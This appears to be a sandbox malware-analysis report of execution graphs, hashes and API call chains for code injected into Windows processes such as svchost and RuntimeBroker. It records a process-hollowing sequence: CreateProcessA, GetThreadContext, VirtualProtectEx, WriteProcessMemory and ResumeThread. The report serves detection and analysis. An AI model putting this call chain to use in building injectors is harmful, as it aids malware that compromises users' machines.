                                                                                                                                                                control_flow_graph 11 a50811-a50846 call a5086e 14 a508ad-a508ae 11->14 15 a50848-a50851 11->15 16 a508af-a508b0 14->16 15->16 17 a50853-a5085c 15->17 18 a508b9-a508cc call a51756 call a51e62 16->18 19 a508d0 17->19 20 a5085e 17->20 24 a508d4 call a508d9 18->24 19->24 21 a508c5-a508cc 20->21 22 a50860-a50861 20->22 21->19 22->18 26 a50863 22->26 28 a50866-a5086f 26->28 29 a508d9-a50906 call a50cc4 call a514bc call a50643 call a50ce8 26->29 32 a50871-a50897 28->32 33 a5089e-a508a4 28->33 44 a5090b-a5090f 29->44 32->33 33->14 45 a50939 call a5093e 44->45
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2883830888.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:67
                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                execution_graph 2536 d408d9 2542 d40cc4 2536->2542 2538 d408e5 2545 d40643 2538->2545 2540 d408ef 2553 d4093e 2540->2553 2560 d40c3f GetPEB 2542->2560 2544 d40cc9 2544->2538 2546 d40660 2545->2546 2562 d4067c 2546->2562 2548 d40673 2568 d406c2 2548->2568 2550 d4080f 2550->2540 2551 d406b9 2551->2550 2572 d40811 2551->2572 2554 d40cc4 GetPEB 2553->2554 2556 d4094a 2554->2556 2555 d40af1 2555->2540 2556->2555 2589 d409d9 2556->2589 2559 d409d2 2559->2555 2593 d40af3 2559->2593 2561 d40c4b 2560->2561 2561->2544 2561->2561 2563 d40681 2562->2563 2564 d406c2 GetPEB 2563->2564 2566 d406b9 2564->2566 2565 d4080f 2565->2548 2566->2565 2567 d40811 GetPEB 2566->2567 2567->2565 2569 d406c7 2568->2569 2570 d4080f 2569->2570 2571 d40811 GetPEB 2569->2571 2570->2551 2571->2570 2573 d40840 2572->2573 2574 d40863 2573->2574 2576 d408b9 2573->2576 2577 d40866 2573->2577 2574->2577 2578 d40cc4 GetPEB 2574->2578 2583 d408d9 2576->2583 2577->2550 2579 d408e5 2578->2579 2580 d40643 GetPEB 2579->2580 2581 d408ef 2580->2581 2582 d4093e GetPEB 2581->2582 2582->2581 2584 d40cc4 GetPEB 2583->2584 2585 d408e5 2584->2585 2586 d40643 GetPEB 2585->2586 2587 d408ef 2586->2587 2588 d4093e GetPEB 2587->2588 2588->2587 2592 d409de 2589->2592 2590 d40af3 GetPEB 2591 d40af1 2590->2591 2591->2559 2592->2590 2592->2591 2595 d40b01 2593->2595 2596 d40cc4 GetPEB 2595->2596 2597 d40b0d 2596->2597 2602 d40b27 2597->2602 2599 d40b20 2606 d40b65 2599->2606 2603 d40b2c 2602->2603 2604 d40b65 GetPEB 2603->2604 2605 d40b57 2603->2605 2604->2605 2605->2599 2610 d40b6a 2606->2610 2612 d408b3 2610->2612 2613 d408b9 2612->2613 2614 d408d9 GetPEB 2613->2614 2614->2613 2615 d40b6b 2616 d40b7d 2615->2616 2617 d408b3 GetPEB 2616->2617 2618 d40bb1 2617->2618 2619 d40c3f GetPEB 2618->2619 2620 d40bb6 2619->2620

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00D40811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2886142488.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:70
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 2505 b508d9 2511 b50cc4 2505->2511 2507 b508e5 2514 b50643 2507->2514 2509 b508ef 2522 b5093e 2509->2522 2529 b50c3f GetPEB 2511->2529 2513 b50cc9 2513->2507 2515 b50660 2514->2515 2531 b5067c 2515->2531 2517 b50673 2537 b506c2 2517->2537 2519 b5080f 2519->2509 2520 b506b9 2520->2519 2541 b50811 2520->2541 2523 b50cc4 GetPEB 2522->2523 2525 b5094a 2523->2525 2524 b50af1 2524->2509 2525->2524 2561 b509d9 2525->2561 2528 b509d2 2528->2524 2565 b50af3 2528->2565 2530 b50c4b 2529->2530 2530->2513 2530->2530 2532 b50681 2531->2532 2533 b506c2 GetPEB 2532->2533 2535 b506b9 2533->2535 2534 b5080f 2534->2517 2535->2534 2536 b50811 GetPEB 2535->2536 2536->2534 2538 b506c7 2537->2538 2539 b5080f 2538->2539 2540 b50811 GetPEB 2538->2540 2539->2520 2540->2539 2552 b5086e 2541->2552 2543 b50840 2545 b508d9 2543->2545 2547 b50866 2543->2547 2546 b50cc4 GetPEB 2545->2546 2548 b508e5 2546->2548 2547->2519 2555 b508d9 2547->2555 2549 b50643 GetPEB 2548->2549 2550 b508ef 2549->2550 2551 b5093e GetPEB 2550->2551 2551->2550 2553 b50873 2552->2553 2553->2543 2554 b508d9 GetPEB 2553->2554 2554->2553 2556 b50cc4 GetPEB 2555->2556 2557 b508e5 2556->2557 2558 b50643 GetPEB 2557->2558 2559 b508ef 2558->2559 2560 b5093e GetPEB 2559->2560 2560->2559 2564 b509de 2561->2564 2562 b50af3 GetPEB 2563 b50af1 2562->2563 2563->2528 2564->2562 2564->2563 2567 b50b01 2565->2567 2568 b50cc4 GetPEB 2567->2568 2569 b50b0d 2568->2569 2574 b50b27 2569->2574 2571 b50b20 2573 b50b57 2571->2573 2578 b50b65 2571->2578 2575 b50b2c 2574->2575 2576 b50b65 GetPEB 2575->2576 2577 b50b57 2576->2577 2577->2571 2582 b50b6a 2578->2582 2584 b508b3 2582->2584 2585 b508b9 2584->2585 2586 b508d9 GetPEB 2585->2586 2586->2585 2587 b50b6b 2588 b50b7d 2587->2588 2589 b508b3 GetPEB 2588->2589 2590 b50bb1 2589->2590 2591 b50c3f GetPEB 2590->2591 2592 b50bb6 2591->2592

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00B50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2879609123.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:7.4%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:80
                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                execution_graph 2511 1108d9 2519 110cc4 2511->2519 2513 1108e5 2522 110643 2513->2522 2515 110939 2530 11093e 2515->2530 2516 1108ef 2516->2515 2518 11091f SleepEx RtlExitUserThread 2516->2518 2518->2515 2537 110c3f GetPEB 2519->2537 2521 110cc9 2521->2513 2523 110660 2522->2523 2539 11067c 2523->2539 2525 110673 2545 1106c2 2525->2545 2527 11080f 2527->2516 2528 1106b9 2528->2527 2549 110811 2528->2549 2531 110cc4 GetPEB 2530->2531 2533 11094a 2531->2533 2532 110af1 2532->2515 2533->2532 2569 1109d9 2533->2569 2536 1109d2 2536->2532 2573 110af3 2536->2573 2538 110c4b 2537->2538 2538->2521 2538->2538 2540 110681 2539->2540 2541 1106c2 7 API calls 2540->2541 2543 1106b9 2541->2543 2542 11080f 2542->2525 2543->2542 2544 110811 7 API calls 2543->2544 2544->2542 2547 1106c7 2545->2547 2546 11080f 2546->2528 2547->2546 2548 110811 7 API calls 2547->2548 2548->2546 2551 110840 2549->2551 2550 110863 2553 110866 2550->2553 2554 110cc4 GetPEB 2550->2554 2551->2550 2551->2553 2561 1108d9 2551->2561 2553->2527 2555 1108e5 2554->2555 2556 110643 5 API calls 2555->2556 2559 1108ef 2556->2559 2557 110939 2558 11093e 5 API calls 2557->2558 2558->2557 2559->2557 2560 11091f SleepEx RtlExitUserThread 2559->2560 2560->2557 2562 110cc4 GetPEB 2561->2562 2563 1108e5 2562->2563 2564 110643 5 API calls 2563->2564 2566 1108ef 2564->2566 2565 110939 2567 11093e 5 API calls 2565->2567 2566->2565 2568 11091f SleepEx RtlExitUserThread 2566->2568 2567->2565 2568->2565 2572 1109de 2569->2572 2570 110af3 7 API calls 2571 110af1 2570->2571 2571->2536 2572->2570 2572->2571 2575 110b01 2573->2575 2576 110cc4 GetPEB 2575->2576 2577 110b0d 2576->2577 2582 110b27 2577->2582 2579 110b20 2586 110b65 2579->2586 2583 110b2c 2582->2583 2584 110b65 7 API calls 2583->2584 2585 110b57 2583->2585 2584->2585 2585->2579 2590 110b6a 2586->2590 2592 1108b3 2590->2592 2593 1108b9 2592->2593 2594 1108d9 5 API calls 2593->2594 2595 1108d5 2594->2595 2596 110cc4 GetPEB 2595->2596 2597 1108e5 2596->2597 2598 110643 5 API calls 2597->2598 2601 1108ef 2598->2601 2599 110939 2600 11093e 5 API calls 2599->2600 2600->2599 2601->2599 2602 11091f SleepEx RtlExitUserThread 2601->2602 2602->2599 2603 110b6b 2605 110b7d 2603->2605 2604 1108b3 7 API calls 2606 110bb1 2604->2606 2605->2604 2607 110c3f GetPEB 2606->2607 2608 110bb6 2607->2608

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00110811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000A.00000002.2886842172.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:6.3%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:31.4%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:462
                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                execution_graph 5646 2303f31 5647 2303f36 5646->5647 5648 2303f5f 5647->5648 5649 2303f4f GetModuleHandleA 5647->5649 5651 2303f6a Sleep 5648->5651 5657 230403f 5649->5657 5652 2303f9c 5651->5652 5653 2303f7a Sleep 5652->5653 5654 2303f9c 5653->5654 5655 2303f8a Sleep 5654->5655 5656 2303f5d 5655->5656 5658 2304052 5657->5658 5659 23040ba 5658->5659 5661 23040be 5658->5661 5659->5656 5666 23039d7 RtlInitializeCriticalSection 5661->5666 5665 23040c8 5665->5659 5667 23039e7 VirtualAlloc 5666->5667 5667->5667 5668 23039ff 5667->5668 5669 230382b VirtualAlloc 5668->5669 5669->5669 5670 2303843 CreateThread 5669->5670 5670->5665 5761 1c495d 5762 1c4970 5761->5762 5763 1c49ae CreateEventA 5762->5763 5764 1c4a63 5762->5764 5766 1c49d1 5763->5766 5765 1c4d53 WaitForSingleObject 5765->5766 5766->5764 5766->5765 5899 1c3e9e 5900 1c3ea1 5899->5900 5903 1c3ec3 5900->5903 5904 1c3653 5903->5904 5905 1c3ec8 LoadLibraryA 5904->5905 5906 1c3eee 5905->5906 5908 1c3ed2 5905->5908 5907 1c3f0d 7 API calls 5906->5907 5911 1c3f03 5907->5911 5909 1c409a 3 API calls 5908->5909 5910 1c3ebd 5909->5910 5912 1c3f3b 5911->5912 5913 1c3f2b GetModuleHandleA 5911->5913 5915 1c3f46 Sleep 5912->5915 5914 1c401b 3 API calls 5913->5914 5916 1c3f39 5914->5916 5917 1c3f78 5915->5917 5916->5910 5918 1c3f56 Sleep 5917->5918 5919 1c3f78 5918->5919 5920 1c3f66 Sleep 5919->5920 5920->5910 5920->5916 5921 1c3e9a 5922 1c3653 5921->5922 5923 1c3e9f GetProcAddress 5922->5923 5924 1c3eaa 5923->5924 5925 1c3ed4 5923->5925 5926 1c3ebd 5924->5926 5927 1c3ec3 12 API calls 5924->5927 5928 1c409a 3 API calls 5925->5928 5927->5926 5929 1c3ee9 5928->5929 5930 23038a7 5931 23038ac 5930->5931 5934 23038f2 5931->5934 5938 230260c 5934->5938 5939 230261a 5938->5939 5771 2303d6a 5772 2303d6f 5771->5772 5773 23039d7 2 API calls 5772->5773 5774 2303d8a 5773->5774 5775 230382b 2 API calls 5774->5775 5776 2303d8f 5775->5776 5777 1c3d46 5778 1c3653 5777->5778 5779 1c3d4b LoadLibraryA 5778->5779 5780 1c3d61 5779->5780 5798 1c3d86 5780->5798 5783 1c3da1 5784 1c1345 3 API calls 5783->5784 5785 1c3dba 5784->5785 5786 1c1345 3 API calls 5785->5786 5787 1c3dd3 5786->5787 5788 1c1345 3 API calls 5787->5788 5789 1c3dec 5788->5789 5790 1c1345 3 API calls 5789->5790 5791 1c3e05 5790->5791 5792 1c1345 3 API calls 5791->5792 5793 1c3e1e 5792->5793 5794 1c1345 3 API calls 5793->5794 5795 1c3e37 5794->5795 5796 1c1345 3 API calls 5795->5796 5797 1c3e50 5796->5797 5799 1c3653 5798->5799 5800 1c3d8b LoadLibraryA 5799->5800 5801 1c3da1 5800->5801 5802 1c1345 3 API calls 5801->5802 5803 1c3dba 5802->5803 5804 1c1345 3 API calls 5803->5804 5805 1c3dd3 5804->5805 5806 1c1345 3 API calls 5805->5806 5807 1c3dec 5806->5807 5808 1c1345 3 API calls 5807->5808 5809 1c3e05 5808->5809 5810 1c1345 3 API calls 5809->5810 5811 1c3e1e 5810->5811 5812 1c1345 3 API calls 5811->5812 5813 1c3e37 5812->5813 5814 1c1345 3 API calls 5813->5814 5815 1c3d7e LoadLibraryA 5814->5815 5815->5783 5970 1c34c6 lstrlen 5973 1c276c 5970->5973 5972 1c34df VirtualFree CloseHandle 5974 1c277d 5973->5974 5974->5972 5981 1c31c6 5982 1c31cb 5981->5982 5983 1c31e9 lstrcat 5982->5983 5984 1c31f6 5983->5984 5985 1c321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 5984->5985 5986 1c3276 5984->5986 5985->5986 5671 2303f2c 5672 2303f31 5671->5672 5677 2303f5d 5671->5677 5673 2303f5f 5672->5673 5674 2303f4f GetModuleHandleA 5672->5674 5676 2303f6a Sleep 5673->5676 5675 230403f 4 API calls 5674->5675 5675->5677 5678 2303f9c 5676->5678 5679 2303f7a Sleep 5678->5679 5680 2303f9c 5679->5680 5681 2303f8a Sleep 5680->5681 5681->5677 5600 21f0000 VirtualProtect 5601 21f034e 5600->5601 5602 21f0528 VirtualProtect 5601->5602 5603 21f06d0 VirtualProtect 5601->5603 5602->5601 5604 1c3ec3 5605 1c3653 5604->5605 5606 1c3ec8 LoadLibraryA 5605->5606 5607 1c3eee 5606->5607 5609 1c3ed2 5606->5609 5622 1c3f0d 5607->5622 5634 1c409a 5609->5634 5611 1c3ee9 5612 1c3f03 5613 1c3f3b 5612->5613 5614 1c3f2b GetModuleHandleA 5612->5614 5616 1c3f46 Sleep 5613->5616 5642 1c401b 5614->5642 5618 1c3f78 5616->5618 5617 1c3f39 5617->5611 5619 1c3f56 Sleep 5618->5619 5620 1c3f78 5619->5620 5621 1c3f66 Sleep 5620->5621 5621->5611 5621->5617 5623 1c3f12 5622->5623 5624 1c3f2b GetModuleHandleA 5623->5624 5625 1c3f3b 5623->5625 5626 1c401b 3 API calls 5624->5626 5627 1c3f46 Sleep 5625->5627 5628 1c3f39 5626->5628 5629 1c3f78 5627->5629 5630 1c3f76 5628->5630 5631 1c3f56 Sleep 5629->5631 5630->5612 5632 1c3f78 5631->5632 5633 1c3f66 Sleep 5632->5633 5633->5628 5633->5630 5635 1c409f 5634->5635 5636 1c1345 3 API calls 5635->5636 5637 1c40bd 5636->5637 5638 1c1345 3 API calls 5637->5638 5639 1c40d6 5638->5639 5640 1c1345 3 API calls 5639->5640 5641 1c40ef 5640->5641 5641->5611 5644 1c402e 5642->5644 5643 1c4096 5643->5617 5644->5643 5645 1c409a 3 API calls 5644->5645 5645->5643 5940 1c3883 5941 1c3888 5940->5941 5944 1c38ce 5941->5944 5943 1c3894 5948 1c25e8 5944->5948 5946 1c38e8 lstrcat 5947 1c38fe 5946->5947 5947->5943 5949 1c25f6 5948->5949 5949->5946 5426 1c093e 5447 1c0cc4 5426->5447 5428 1c094a 5450 1c14bc 5428->5450 5430 1c094f 5431 1c0954 Sleep RtlExitUserThread OpenMutexA 5430->5431 5432 1c098f GetStartupInfoA 5431->5432 5433 1c0af1 5431->5433 5465 1c09d9 5432->5465 5435 1c0a3d DuplicateHandle 5436 1c0aec 5435->5436 5437 1c0a82 WriteProcessMemory 5435->5437 5479 1c0af3 5436->5479 5437->5436 5439 1c0ab0 ResumeThread 5437->5439 5438 1c0a3c 5438->5435 5441 1c0ac1 Sleep OpenMutexA 5439->5441 5441->5433 5444 1c0ae7 5441->5444 5442 1c09d2 5442->5435 5442->5438 5443 1c09de CreateProcessA 5442->5443 5443->5436 5445 1c09ee GetThreadContext 5443->5445 5444->5436 5444->5441 5445->5436 5446 1c0a16 VirtualProtectEx 5445->5446 5446->5436 5446->5438 5481 1c0c3f GetPEB 5447->5481 5449 1c0cc9 5449->5428 5483 1c14de 5450->5483 5454 1c1345 3 API calls 5456 1c152b 5454->5456 5455 1c14d8 5497 1c1345 5455->5497 5457 1c1345 3 API calls 5456->5457 5458 1c1544 5457->5458 5459 1c1345 3 API calls 5458->5459 5460 1c155d 5459->5460 5461 1c1345 3 API calls 5460->5461 5462 1c1576 5461->5462 5463 1c1345 3 API calls 5462->5463 5464 1c158f 5463->5464 5464->5430 5504 1c3653 5465->5504 5467 1c09de CreateProcessA 5468 1c0aec 5467->5468 5469 1c09ee GetThreadContext 5467->5469 5471 1c0af3 21 API calls 5468->5471 5469->5468 5470 1c0a16 VirtualProtectEx 5469->5470 5470->5468 5472 1c0a3c DuplicateHandle 5470->5472 5473 1c0af1 5471->5473 5472->5468 5475 1c0a82 WriteProcessMemory 5472->5475 5473->5442 5475->5468 5476 1c0ab0 ResumeThread 5475->5476 5477 1c0ac1 Sleep OpenMutexA 5476->5477 5477->5473 5478 1c0ae7 5477->5478 5478->5468 5478->5477 5506 1c0b01 5479->5506 5482 1c0c4b 5481->5482 5482->5449 5482->5482 5484 1c14e3 5483->5484 5485 1c1345 3 API calls 5484->5485 5486 1c1512 5485->5486 5487 1c1345 3 API calls 5486->5487 5488 1c152b 5487->5488 5489 1c1345 3 API calls 5488->5489 5490 1c1544 5489->5490 5491 1c1345 3 API calls 5490->5491 5492 1c155d 5491->5492 5493 1c1345 3 API calls 5492->5493 5494 1c1576 5493->5494 5495 1c1345 3 API calls 5494->5495 5496 1c158f 5495->5496 5496->5455 5498 1c1358 5497->5498 5499 1c13eb 5497->5499 5498->5499 5500 1c1364 VirtualProtect 5498->5500 5499->5454 5500->5499 5501 1c137c VirtualAlloc 5500->5501 5501->5501 5502 1c1391 5501->5502 5503 1c13ad VirtualProtect 5502->5503 5503->5499 5505 1c3665 5504->5505 5505->5467 5505->5505 5507 1c0cc4 GetPEB 5506->5507 5508 1c0b0d 5507->5508 5513 1c0b27 5508->5513 5510 1c0b20 5519 1c0b65 5510->5519 5514 1c3653 5513->5514 5515 1c0b2c LoadLibraryA 5514->5515 5516 1c0b42 5515->5516 5517 1c0b65 28 API calls 5516->5517 5518 1c0b57 5516->5518 5517->5518 5518->5510 5520 1c3653 5519->5520 5521 1c0b6a FindWindowA 5520->5521 5522 1c0bac 5521->5522 5523 1c0b74 GetWindowThreadProcessId OpenProcess 5521->5523 5530 1c08b3 5522->5530 5523->5522 5527 1c0b8e 5523->5527 5527->5522 5528 1c0ba4 ExitProcess 5527->5528 5533 1c08b9 5530->5533 5541 1c08d9 5533->5541 5542 1c0cc4 GetPEB 5541->5542 5543 1c08e5 5542->5543 5544 1c14bc 3 API calls 5543->5544 5545 1c08ea 5544->5545 5549 1c0643 5545->5549 5548 1c08ef 5557 1c093e 5548->5557 5550 1c0660 5549->5550 5578 1c067c 5550->5578 5552 1c0673 5584 1c06c2 5552->5584 5554 1c080f 5554->5548 5555 1c06b9 5555->5554 5588 1c0811 5555->5588 5558 1c0cc4 GetPEB 5557->5558 5559 1c094a 5558->5559 5560 1c14bc 3 API calls 5559->5560 5561 1c094f 5560->5561 5562 1c0954 Sleep RtlExitUserThread OpenMutexA 5561->5562 5563 1c098f GetStartupInfoA 5562->5563 5564 1c0af1 5562->5564 5565 1c09d9 17 API calls 5563->5565 5564->5548 5573 1c09d2 5565->5573 5566 1c0a3d DuplicateHandle 5567 1c0aec 5566->5567 5568 1c0a82 WriteProcessMemory 5566->5568 5571 1c0af3 17 API calls 5567->5571 5568->5567 5570 1c0ab0 ResumeThread 5568->5570 5569 1c0a3c 5569->5566 5572 1c0ac1 Sleep OpenMutexA 5570->5572 5571->5564 5572->5564 5575 1c0ae7 5572->5575 5573->5566 5573->5569 5574 1c09de CreateProcessA 5573->5574 5574->5567 5576 1c09ee GetThreadContext 5574->5576 5575->5567 5575->5572 5576->5567 5577 1c0a16 VirtualProtectEx 5576->5577 5577->5567 5577->5569 5579 1c0681 5578->5579 5580 1c06c2 29 API calls 5579->5580 5582 1c06b9 5580->5582 5581 1c080f 5581->5552 5582->5581 5583 1c0811 29 API calls 5582->5583 5583->5581 5586 1c06c7 5584->5586 5585 1c080f 5585->5555 5586->5585 5587 1c0811 29 API calls 5586->5587 5587->5585 5590 1c0840 5588->5590 5589 1c08d9 29 API calls 5591 1c0863 5589->5591 5590->5589 5590->5591 5592 1c0866 5590->5592 5591->5592 5593 1c0cc4 GetPEB 5591->5593 5592->5554 5594 1c08e5 5593->5594 5595 1c14bc 3 API calls 5594->5595 5596 1c08ea 5595->5596 5597 1c0643 29 API calls 5596->5597 5599 1c08ef 5597->5599 5598 1c093e 29 API calls 5598->5599 5599->5598 5682 1c2f3f 5683 1c2f44 5682->5683 5684 1c2f4a lstrlen 5683->5684 5685 1c2f61 5684->5685 5309 2300000 5311 2300005 5309->5311 5326 2300ce8 5311->5326 5313 2300011 5329 23033ca 5313->5329 5315 2300016 5333 230098b OpenMutexA 5315->5333 5318 230038f 5319 230002e 5319->5318 5322 2300697 5319->5322 5349 23006a0 5319->5349 5355 23006e6 5322->5355 5323 2300833 5324 23006dd 5324->5323 5359 2300835 5324->5359 5367 2300c63 GetPEB 5326->5367 5328 2300ced 5328->5313 5330 23033ea 5329->5330 5369 2303409 GetVolumeInformationA 5330->5369 5332 2303405 5332->5315 5334 23009b3 GetStartupInfoA 5333->5334 5335 230001b ExitProcess 5333->5335 5371 23009fd 5334->5371 5335->5319 5337 2300a60 5337->5335 5338 23009f6 5338->5337 5339 2300a02 CreateProcessA 5338->5339 5340 2300b10 5339->5340 5341 2300a12 GetThreadContext 5339->5341 5340->5335 5384 2300b17 5340->5384 5341->5340 5342 2300a3a VirtualProtectEx 5341->5342 5342->5340 5344 2300a65 DuplicateHandle 5342->5344 5344->5340 5345 2300aa6 WriteProcessMemory 5344->5345 5345->5340 5346 2300ad4 ResumeThread 5345->5346 5347 2300ae5 Sleep OpenMutexA 5346->5347 5347->5335 5348 2300b0b 5347->5348 5348->5340 5348->5347 5350 23006a5 5349->5350 5351 23006e6 3 API calls 5350->5351 5353 23006dd 5351->5353 5352 2300833 5352->5322 5353->5352 5354 2300835 3 API calls 5353->5354 5354->5352 5357 23006eb 5355->5357 5356 2300833 5356->5324 5357->5356 5358 2300835 3 API calls 5357->5358 5358->5356 5361 2300864 5359->5361 5360 2300887 5363 230088a 5360->5363 5364 2300ce8 GetPEB 5360->5364 5361->5360 5362 23008fd 3 API calls 5361->5362 5361->5363 5362->5360 5363->5323 5366 2300909 5364->5366 5365 2300962 3 API calls 5365->5366 5366->5365 5368 2300c6f 5367->5368 5368->5328 5368->5368 5370 230342b 5369->5370 5370->5332 5386 2303677 5371->5386 5373 2300a02 CreateProcessA 5374 2300b10 5373->5374 5375 2300a12 GetThreadContext 5373->5375 5377 2300b15 5374->5377 5378 2300b17 6 API calls 5374->5378 5375->5374 5376 2300a3a VirtualProtectEx 5375->5376 5376->5374 5379 2300a65 DuplicateHandle 5376->5379 5377->5338 5378->5377 5379->5374 5380 2300aa6 WriteProcessMemory 5379->5380 5380->5374 5381 2300ad4 ResumeThread 5380->5381 5382 2300ae5 Sleep OpenMutexA 5381->5382 5382->5377 5383 2300b0b 5382->5383 5383->5374 5383->5382 5388 2300b25 5384->5388 5387 2303689 5386->5387 5387->5373 5387->5387 5389 2300ce8 GetPEB 5388->5389 5390 2300b31 5389->5390 5395 2300b4b 5390->5395 5392 2300b44 5401 2300b89 5392->5401 5396 2303677 5395->5396 5397 2300b50 LoadLibraryA 5396->5397 5398 2300b66 5397->5398 5399 2300b89 5 API calls 5398->5399 5400 2300b7b 5398->5400 5399->5400 5400->5392 5402 2300b8e 5401->5402 5403 2300bd0 5402->5403 5406 2300ba1 OpenProcess 5402->5406 5411 23008d7 5403->5411 5406->5403 5408 2300bb2 5406->5408 5408->5403 5409 2300bc8 ExitProcess 5408->5409 5412 23008dd 5411->5412 5418 23008fd 5412->5418 5419 2300ce8 GetPEB 5418->5419 5421 2300909 5419->5421 5422 2300962 5421->5422 5423 2300ce8 GetPEB 5422->5423 5424 230096e 5423->5424 5425 2300978 Sleep RtlExitUserThread 5424->5425 5686 1c292d 5687 1c3653 5686->5687 5688 1c2932 LoadLibraryA 5687->5688 5689 1c2948 5688->5689 5690 1c2961 VirtualAlloc 5689->5690 5690->5690 5691 1c2979 5690->5691 5709 1c29a6 5691->5709 5710 1c3653 5709->5710 5711 1c29ab lstrcat 5710->5711 5712 1c29c1 5711->5712 5726 1c29dd 5712->5726 5727 1c3653 5726->5727 5728 1c29e2 lstrcat 5727->5728 5729 1c29f8 5728->5729 5739 1c2a14 5729->5739 5740 1c3653 5739->5740 5741 1c2a19 lstrcat 5740->5741 5746 1c2a20 